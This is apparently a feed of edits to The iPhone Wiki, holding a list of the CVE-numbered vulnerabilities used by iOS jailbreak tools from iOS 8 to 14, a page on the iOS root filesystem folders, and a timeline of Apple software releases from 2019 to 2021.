* Code signing exploit ({{cve|2015-3806}})&lt;br /&gt;
* IOHIDFamily exploit ({{cve|2015-5774}})&lt;br /&gt;
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})&lt;br /&gt;
&lt;br /&gt;
=== [[EtasonJB]] and [[Home Depot]] (8.4.1) === &lt;br /&gt;
&lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 9.x ==&lt;br /&gt;
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===&lt;br /&gt;
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})&lt;br /&gt;
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables.  ({{cve|2015-7051}})&lt;br /&gt;
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})&lt;br /&gt;
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})&lt;br /&gt;
* Racing KPP for some of the patches.&lt;br /&gt;
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})&lt;br /&gt;
&lt;br /&gt;
=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Home Depot]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
&lt;br /&gt;
=== [[JailbreakMe 4.0]] (9.1-9.3.4) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* Kernel exploit ({{cve|2016-4656}})&lt;br /&gt;
* Webkit exploit ({{cve|2016-4657}})&lt;br /&gt;
&lt;br /&gt;
=== [[Phœnix]] (9.3.5 / 9.3.6) === &lt;br /&gt;
* OSUnserialize Information leak ({{cve|2016-4655}})&lt;br /&gt;
* mach_port_register Kernel exploit ({{cve|2016-4669}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 10.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===&lt;br /&gt;
&lt;br /&gt;
* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})&lt;br /&gt;
&lt;br /&gt;
=== [[yalu102]] (10.0.1-10.2) ===&lt;br /&gt;
&lt;br /&gt;
* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[Odyssey]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5&lt;br /&gt;
&lt;br /&gt;
* tardy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)&lt;br /&gt;
&lt;br /&gt;
* FreeTheSandbox_LPE_POC_13.7&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with A8/A9 SoCs)&lt;br /&gt;
&lt;br /&gt;
* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (14.0 - 14.2~b)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
===[[unc0ver]] (14.0 - 14.3)===&lt;br /&gt;
&lt;br /&gt;
* (untitled exploit) ({{cve|2021-1782}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/&amp;diff=111026</id>
		<title>/</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/&amp;diff=111026"/>
		<updated>2021-02-23T18:06:55Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Folders */ .HFS+ Private Directory Data was removed&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;br /&gt;
This is the root directory for [[iOS]]. The firmware listing of these folders follow very closely to the [[wikipedia:Filesystem Hierarchy Standard|Filesystem Hierarchy Standard]] for [[wikipedia:Unix|Unix]] and [[wikipedia:Unix-like|Unix-like]] [[wikipedia:Operating system|operating systems]].&lt;br /&gt;
&lt;br /&gt;
== Children ==&lt;br /&gt;
=== Folders ===&lt;br /&gt;
* {{ipfw|.ba}}&lt;br /&gt;
* {{ipfw|.HFS+ Private Directory Data}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|.mb}}&lt;br /&gt;
* {{ipfw|AppleInternal}} ([[Apple Internal Apps|Apple Internal apps]] and [[Prototype Firmware|prototypes]]; only present in some internal iOS versions)&lt;br /&gt;
* {{ipfw|Applications}}&lt;br /&gt;
* {{ipfw|bin}}&lt;br /&gt;
* {{ipfw|boot}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|cores}}&lt;br /&gt;
* {{ipfw|dev}}&lt;br /&gt;
* {{ipfw|Developer}}&lt;br /&gt;
* {{ipfw|private/etc|etc}} ([[wikipedia:Symbolic link|symlink]] to &amp;lt;code&amp;gt;/private/etc&amp;lt;/code&amp;gt;)&lt;br /&gt;
* {{ipfw|Library}}&lt;br /&gt;
* {{ipfw|lib}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|mnt}}&lt;br /&gt;
* {{ipfw|private}}&lt;br /&gt;
* {{ipfw|sbin}}&lt;br /&gt;
* {{ipfw|System}}&lt;br /&gt;
* {{ipfw|private/var/tmp|tmp}} (symlink to &amp;lt;code&amp;gt;/private/var/tmp&amp;lt;/code&amp;gt;)&lt;br /&gt;
* {{ipfw|private/var/mobile|User}} (symlink to &amp;lt;code&amp;gt;/private/var/mobile&amp;lt;/code&amp;gt; ({{ipfw|private/var/root|/private/var/root}} on [[iOS|iPhone OS]] 1.1.2 and below)&lt;br /&gt;
* {{ipfw|usr}}&lt;br /&gt;
* {{ipfw|private/var|var}} (symlink to &amp;lt;code&amp;gt;/private/var&amp;lt;/code&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
=== Files ===&lt;br /&gt;
* {{ipfw|.file}}&lt;br /&gt;
* {{ipfw|.Trashes}}&lt;br /&gt;
&lt;br /&gt;
== External Links ==&lt;br /&gt;
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html Filesystem Hierachy Standard 2.3]&lt;br /&gt;
* [https://developer.apple.com/library/mac/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html File System Basics (Apple)]&lt;br /&gt;
[[Category:Filesystem]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Timeline&amp;diff=111024</id>
		<title>Timeline</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Timeline&amp;diff=111024"/>
		<updated>2021-02-23T13:11:19Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* July */ Fixes typo&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{float toc|right}}&lt;br /&gt;
{{see also|The iPhone Wiki:Current events}}&lt;br /&gt;
== 2021 ==&lt;br /&gt;
=== February ===&lt;br /&gt;
* 17 February -- macOS 11.3 beta 2 released.&lt;br /&gt;
* 16 February -- iOS/iPadOS 14.5 beta 2, tvOS 14.5 beta 2, and watchOS 7.4 beta 2 released.&lt;br /&gt;
* 15 February -- watchOS 7.3.1 for [[Apple Watch Series 5]] and [[Apple Watch SE]] and macOS 11.2.1 (20D75) released.&lt;br /&gt;
* 9 February -- macOS 11.2.1 (20D74) released.&lt;br /&gt;
* 4 February -- Revised iOS/iPadOS 14.5 beta released.&lt;br /&gt;
* 2 February -- macOS 11.3 beta released.&lt;br /&gt;
* 1 February -- audioOS 14.5 beta, iOS/iPadOS 14.5 beta, tvOS 14.5 beta, and watchOS 7.4 beta released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- macOS 11.2 [[Release Candidate|RC]] 3 released.&lt;br /&gt;
* 26 January -- audioOS 14.4, iOS/iPadOS 14.4, tvOS 14.4, and watchOS 7.3 released.&lt;br /&gt;
* 25 January -- macOS 11.2 [[Release Candidate|RC]] 2 released.&lt;br /&gt;
* 21 January -- audioOS 14.4 [[Release Candidate|RC]], macOS 11.2 [[Release Candidate|RC]], iOS/iPadOS 14.4 [[Release Candidate|RC]], tvOS 14.4 [[Release Candidate|RC]], and watchOS 7.3 [[Release Candidate|RC]] released.&lt;br /&gt;
* 13 January -- audioOS 14.4 beta 2, macOS 11.2 beta 2, iOS/iPadOS 14.4 beta 2, tvOS 14.4 beta 2, and watchOS 7.3 beta 2 released.&lt;br /&gt;
* 11 January -- iOS/iPadOS 12.5.1 released.&lt;br /&gt;
&lt;br /&gt;
== 2020 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 16 December -- audioOS 14.4 beta, macOS 11.2 beta, iOS/iPadOS 14.4 beta, tvOS 14.4 beta, and watchOS 7.3 beta released.&lt;br /&gt;
* 15 December -- audioOS 14.3 released.&lt;br /&gt;
* 14 December -- bridgeOS 5.1, macOS 11.1, iOS/iPadOS 12.5 and 14.3, tvOS 14.3, Apple TV Software Update 7.6.2/iOS 8.4.6, and watchOS 6.3 and 7.2 released.&lt;br /&gt;
* 10 December -- macOS 11.1 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]] 2 released.&lt;br /&gt;
* 8 December -- audioOS 14.3 [[Release Candidate|RC]], iOS/iPadOS 14.3 [[Release Candidate|RC]], tvOS 14.3 [[Release Candidate|RC]], and watchOS 7.2 [[Release Candidate|RC]] released.&lt;br /&gt;
* 7 December -- audioOS 14.2.1 released.&lt;br /&gt;
* 2 December -- [[Chimera]] updated to support up to 12.4.9 on pre-A12. audioOS 14.3 beta 3, iOS/iPadOS 14.3 beta 3, tvOS 14.3 beta 3, and watchOS 7.2 beta 3 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 20 November -- [[Odyssey]] 1.2 released for iOS 13.0-13.7.&lt;br /&gt;
* 19 November -- iOS 14.2.1 for all iPhone 12 models released.&lt;br /&gt;
* 18 November -- iOS 14.2 (18B111) for all iPhone 12 models, audioOS 14.3 beta 2, tvOS 14.3 beta 2, and watchOS 7.2 beta 2 released.&lt;br /&gt;
* 17 November -- iOS/iPadOS 14.3 beta 2 released.&lt;br /&gt;
* 12 November -- audioOS 14.3 beta, iOS/iPadOS 14.3 beta, tvOS 14.3 beta, and watchOS 7.2 beta released.&lt;br /&gt;
* 5 November -- audioOS 14.2, iOS/iPadOS 12.4.9 and 14.2, tvOS 14.2, watchOS 5.3.9, 6.2.9 and 7.1, and 7.6.1/8.4.4 (12H911) for [[Apple TV (3rd generation)]] released. &lt;br /&gt;
* 2 November —- tvOS 14.2 RC and watchOS 7.1 RC released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 30 October —- iOS/iPadOS 14.2 Release Candidate (RC) released.&lt;br /&gt;
* 22 October -- watchOS 7.1 beta 4 released.&lt;br /&gt;
* 20 October -- iOS/iPadOS 14.1, audioOS 14.1, and tvOS 14.2 beta 4 released. &lt;br /&gt;
* 19 October -- watchOS 7.0.3 for [[Apple Watch Series 3]] released.&lt;br /&gt;
* 13 October -- audioOS 14.2 beta 3, iOS/iPadOS 14.1 [[Golden Master|GM]], 14.2 beta 3, tvOS 14.2 beta 3, and watchOS 7.1 beta 3 released. [[iPhone 12 mini]], [[iPhone 12]], [[iPhone 12 Pro]], and [[iPhone 12 Pro Max]] announced.&lt;br /&gt;
* 12 October -- watchOS 7.0.2 released.&lt;br /&gt;
* 5 October -- tvOS 14.0.2 released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 29 September -- audioOS 14.2 beta 2, iOS/iPadOS 14.2 beta 2, tvOS 14.2 beta 2, and watchOS 7.1 beta 2 released.&lt;br /&gt;
* 24 September -- iOS/iPadOS 14.0.1, tvOS 14.0.1 and watchOS 7.0.1 released. &lt;br /&gt;
* 23 September -- iPadOS 14.2 beta (18B5052i) for [[iPad (8th generation)]] released.&lt;br /&gt;
* 17 September -- audioOS 14.2 beta, iOS/iPadOS 14.2 beta, tvOS 14.2 beta, and watchOS 7.1 beta released.&lt;br /&gt;
* 16 September -- iOS/iPadOS 14.0, tvOS 14.0, watchOS 7.0, and 7.6/8.4.4 (12H903) for [[Apple TV (3rd generation)]] released. &lt;br /&gt;
* 15 September -- iOS/iPadOS 14.0 [[Golden Master|GM]], tvOS 14.0 [[Golden Master|GM]], and watchOS 7.0 [[Golden Master|GM]] released. [[iPad (8th generation)]], [[iPad Air (4th generation)]], [[Apple Watch SE]] and [[Apple Watch Series 6]] announced at &amp;quot;Time Flies&amp;quot; Event.&lt;br /&gt;
* 9 September -- audioOS 14.1 beta 8, iOS/iPadOS 14.0 beta 8, tvOS 14.0 beta 8, and watchOS 7.0 beta 8 released.&lt;br /&gt;
* 3 September -- audioOS 14.1 beta 7, iOS/iPadOS 14.0 beta 7, and tvOS 14.0 beta 7 released.&lt;br /&gt;
* 1 September -- iOS/iPadOS 13.7  released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 29 August -- [[Odyssey]] released to jailbreak iOS/iPadOS 13.0-13.5 on A9-A13 semi-untethered.&lt;br /&gt;
* 26 August -- iOS/iPadOS 13.7 beta released.&lt;br /&gt;
* 25 August -- audioOS 14.1 beta 6, iOS/iPadOS 14.0 beta 6, tvOS 14.0 beta 6, and watchOS 7.0 beta 6 released.&lt;br /&gt;
* 18 August -- audioOS 14.1 beta 5, iOS/iPadOS 14.0 beta 5, tvOS 14.0 beta 5, and watchOS 7.0 beta 5 released.&lt;br /&gt;
* 12 August -- iOS/iPadOS 13.6.1 released.&lt;br /&gt;
* 4 August -- audioOS 14 beta 4, iOS/iPadOS 14.0 beta 4, tvOS 14.0 beta 4, and watchOS 7.0 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== July ===&lt;br /&gt;
* 22 July -- audioOS 14 beta 3, iOS/iPadOS 14.0 beta 3, tvOS 14.0 beta 3, and watchOS 7.0 beta 3 released.&lt;br /&gt;
* 9 July -- iOS/iPadOS 13.6 [[Golden Master|GM]], tvOS 13.4.8 [[Golden Master|GM]], and watchOS 6.2.8 [[Golden Master|GM]] released. First public beta's of iOS 14 and tvOS 14 released. &lt;br /&gt;
* 7 July -- audioOS 14 beta 2, iOS/iPadOS 14.0 beta 2, tvOS 14.0 beta 2, and watchOS 7.0 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
=== June ===&lt;br /&gt;
* 30 June -- iOS/iPadOS 13.6 beta 3, tvOS 13.4.8 beta 3, and watchOS 6.2.8 beta 3 released.&lt;br /&gt;
* 22 June -- audioOS 14 beta, iOS 14, tvOS 14 and watchOS 7 announced with first beta released. &lt;br /&gt;
* 10 June -- watchOS 6.2.8 beta 2 released.&lt;br /&gt;
* 9 June -- iOS/iPadOS 13.6 beta 2 and tvOS 13.4.8 beta 2 released.&lt;br /&gt;
* 3 June -- tvOS 13.4.8 beta and watchOS 6.2.8 beta released.&lt;br /&gt;
* 1 June -- audioOS 13.4.6, iOS/iPadOS 13.5.1 and 13.5.5 beta, tvOS 13.4.6 and watchOS 6.2.6 released.&lt;br /&gt;
&lt;br /&gt;
=== May ===&lt;br /&gt;
* 26 May -- [[unc0verTV]] 5.1.0~b1 released to jailbreak [[J42dAP|Apple TV HD]] and [[J105aAP|Apple TV 4K]] running tvOS 11.0 through 13.4.5.&lt;br /&gt;
* 23 May -- [[unc0ver]] updated to 5.0.0 to jailbreak devices running iOS 11.0 through 13.5.&lt;br /&gt;
* 20 May -- iOS 12.4.7, iOS/iPadOS 13.5, tvOS 13.4.5 and audioOS 13.4.5 released.&lt;br /&gt;
* 18 May -- iOS/iPadOS 13.5 [[Golden Master|GM]], tvOS 13.4.5 [[Golden Master|GM]], watchOS 5.3.7 and watchOS 6.2.5 released.&lt;br /&gt;
* 14 May -- watchOS 6.2.5 beta 5 released.&lt;br /&gt;
* 6 May -- iOS/iPadOS 13.5 beta 4, tvOS 13.4.5 beta 4 and watchOS 6.2.5 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== April ===&lt;br /&gt;
* 29 April -- iOS/iPadOS 13.5 beta 3, tvOS 13.4.5 beta 3, and watchOS 6.2.5 beta 3 released.&lt;br /&gt;
* 23 April -- iOS 13.4.1 released for [[D79AP|iPhone SE (2nd generation)]].&lt;br /&gt;
* 15 April -- iOS/iPadOS 13.4.5 beta 2, tvOS 13.4.5 beta 2, and watchOS 6.2.5 beta 2 released.&lt;br /&gt;
* 8 April -- watchOS 6.2.1 released.&lt;br /&gt;
* 7 April -- iOS/iPadOS 13.4.1 released.&lt;br /&gt;
* 1 April -- watchOS 6.2.5 beta released.&lt;br /&gt;
&lt;br /&gt;
=== March ===&lt;br /&gt;
* 31 March -- iOS/iPadOS 13.4.5 beta and tvOS 13.4.5 beta released.&lt;br /&gt;
* 24 March -- audioOS 13.4, bridgeOS 4.4, iOS 12.4.6, iOS/iPadOS 13.4, tvOS 13.4, Apple TV Software Update 7.5, watchOS 5.3.6 and 6.2 released.&lt;br /&gt;
* 18 March -- iOS/iPadOS 13.4 beta 6, tvOS 13.4 beta 6 and watchOS 6.2 beta 6 released.&lt;br /&gt;
* 11 March -- watchOS 6.2 beta 5 released.&lt;br /&gt;
* 10 March -- iOS/iPadOS 13.4 beta 5 and tvOS 13.4 beta 5 released.&lt;br /&gt;
* 4 March -- watchOS 6.2 beta 4 released.&lt;br /&gt;
* 3 March -- iOS/iPadOS 13.4 beta 4 and tvOS 13.4 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== February ===&lt;br /&gt;
* 26 February -- iOS/iPadOS 13.4 beta 3, tvOS 13.4 beta 3 and watchOS 6.2 beta 3 released.&lt;br /&gt;
* 25 February -- [[unc0ver]] updated to support A8-A11 devices running iOS/iPadOS 13.0-13.3.&lt;br /&gt;
* 19 February -- iOS/iPadOS 13.4 beta 2, tvOS 13.4 beta 2 and watchOS 6.2 beta 2 released.&lt;br /&gt;
* 18 February -- watchOS 5.3.5 released.&lt;br /&gt;
* 15 February -- [[unc0ver]] updated to support A12 and A13 devices running iOS/iPadOS 13.0-13.3.&lt;br /&gt;
* 5 February -- iOS/iPadOS 13.4 beta, tvOS 13.4 beta and watchOS 6.2 beta released.&lt;br /&gt;
&lt;br /&gt;
=== January ===&lt;br /&gt;
* 28 January -- iOS/iPadOS 13.3.1, tvOS 13.3.1, watchOS 6.1.2 and iOS 12.4.5 released.&lt;br /&gt;
* 22 January -- iOS/iPadOS 13.3.1 beta 3, tvOS 13.3.1 beta 3 and watchOS 6.1.2 beta 3 released.&lt;br /&gt;
* 17 January -- iOS/iPadOS 13.3.1 beta 2, tvOS 13.3.1 beta 2 and watchOS 6.1.2 beta 2 released.&lt;br /&gt;
&lt;br /&gt;
== 2019 ==&lt;br /&gt;
=== December ===&lt;br /&gt;
* 17 December -- iOS/iPadOS 13.3.1 beta, tvOS 13.3.1 beta and watchOS 6.1.2 beta released.&lt;br /&gt;
* 10 December -- audioOS 13.3, iOS/iPadOS 13.3, tvOS 13.3 and watchOS 6.1.1 released&lt;br /&gt;
* 5 December -- iOS/iPadOS 13.3 beta 4, tvOS 13.3 beta 4 and watchOS 6.1.1 beta 4 released.&lt;br /&gt;
&lt;br /&gt;
=== November ===&lt;br /&gt;
* 20 November -- iOS/iPadOS 13.3 beta 3, tvOS 13.3 beta 3 and watchOS 6.1.1 beta 3 released.&lt;br /&gt;
* 18 November -- iOS/iPadOS 13.2.3 released.&lt;br /&gt;
* 12 November -- iOS/iPadOS 13.3 beta 2, tvOS 13.3 beta 2 and watchOS 6.1.1 beta 2 released.&lt;br /&gt;
* 10 November -- [[checkra1n]] beta 0.9 released.&lt;br /&gt;
* 7 November -- iOS/iPadOS 13.2.2 released.&lt;br /&gt;
* 5 November -- iOS/iPadOS 13.3 beta, tvOS 13.3 beta and watchOS 6.1.1 beta released.&lt;br /&gt;
&lt;br /&gt;
=== October ===&lt;br /&gt;
* 30 October -- audioOS 13.2.1 released.&lt;br /&gt;
* 29 October -- watchOS 5.3.3 and 6.1 released.&lt;br /&gt;
* 28 October -- iOS/iPadOS 13.2, iOS 12.4.3, audioOS 13.2 and tvOS 13.2 released.&lt;br /&gt;
* 23 October -- iOS/iPadOS 13.2 beta 4, watchOS 6.1 beta 5 and tvOS 13.2 beta 4 released.&lt;br /&gt;
* 16 October -- iOS/iPadOS 13.2 beta 3, watchOS 6.1 beta 4 and tvOS 13.2 beta 3 released.&lt;br /&gt;
* 15 October -- iOS/iPadOS 13.1.3 released.&lt;br /&gt;
* 10 October -- iOS/iPadOS 13.2 beta 2, watchOS 6.1 beta 3 and tvOS 13.2 beta 2 released.&lt;br /&gt;
* 9 October -- watchOS 5.3.2 for [[Apple Watch Series 4]] released.&lt;br /&gt;
* 7 October -- [[bridgeOS]] 4.0 released.&lt;br /&gt;
* 2 October -- iOS/iPadOS 13.2 beta, watchOS 6.1 beta 2 and tvOS 13.2 beta released.&lt;br /&gt;
&lt;br /&gt;
=== September ===&lt;br /&gt;
* 30 September -- iOS/iPadOS 13.1.2, watchOS 6.0.1, and watchOS 5.3.2 for [[Apple Watch Series 3]] released.&lt;br /&gt;
* 27 September -- iOS/iPadOS 13.1.1 released.&lt;br /&gt;
* 26 September -- iOS 12.4.2 for [[iPad Air]], [[iPad mini 2]], [[iPad mini 3]], [[iPhone 5s]], [[N61AP|iPhone 6]], [[N56AP|iPhone 6 Plus]], [[N102AP|iPod touch (6th generation)]], and watchOS 5.3.2 for [[Apple Watch Series 1]] and [[Apple Watch Series 2]] released.&lt;br /&gt;
* 24 September -- iOS/iPadOS 13.1 and tvOS 13.0 released.&lt;br /&gt;
* 23 September -- watchOS 6.1 beta released.&lt;br /&gt;
* 22 September -- [[unc0ver]] updated to v3.7.0b1 with iOS 12.0-12.4 support (excluding iOS 12.3-12.3.1) for A12/A12X devices.&lt;br /&gt;
* 20 September -- [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]] available to purchase. tvOS 13 beta 11 renamed to [[Golden Master|GM]].&lt;br /&gt;
* 19 September -- iOS 13.0 for [[List of iPhones|iPhones]] and watchOS 6.0 released.&lt;br /&gt;
* 18 September -- iOS/iPadOS 13.1 beta 4 and tvOS 13.0 beta 11 released.&lt;br /&gt;
* 13 September -- [[N104AP|iPhone 11]], [[D421AP|iPhone 11 Pro]], and [[D431AP|iPhone 11 Pro Max]] available for pre-order.&lt;br /&gt;
* 11 September -- watchOS 6.0 [[Golden Master|GM]] released.&lt;br /&gt;
* 10 September -- '''By Innovation Only 2019''' event announcing [[Apple Watch Series 5]], [[iPad (7th generation)]], [[iPhone 11]], [[iPhone 11 Pro]], [[iPhone 11 Pro Max]]. iOS/iPadOS 13.1 beta 3, tvOS 13.0 beta 10, and iOS 13.0 [[Golden Master|GM]] (excluding iPod touch) released.&lt;br /&gt;
* 4 September -- iOS/iPadOS 13.1 beta 2 and tvOS 13.0 beta 9 released.&lt;br /&gt;
&lt;br /&gt;
=== August ===&lt;br /&gt;
* 27 August -- iOS/iPadOS 13.1 beta, tvOS 13.0 beta 8 and watchOS 6.0 beta 9 released.&lt;br /&gt;
* 26 August -- iOS 12.4.1, tvOS 12.4.1, and watchOS 5.3.1 released.&lt;br /&gt;
* 21 August -- iOS/iPadOS 13.0 beta 8 and watchOS 6.0 beta 8 released. [[Chimera|ChimeraTV]] updated to support tvOS 12.4.&lt;br /&gt;
* 19 August -- [[Chimera]] updated to 1.2.8 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for A9-A11 devices.&lt;br /&gt;
* 18 August -- [[unc0ver]] updated to v3.5.0 with iOS 12.4 support (excluding iOS 12.3-12.3.2) for non A12 devices.&lt;br /&gt;
* 15 August -- iOS/iPadOS 13.0 beta 7, tvOS 13.0 beta 7 and watchOS 6.0 beta 7 released.&lt;br /&gt;
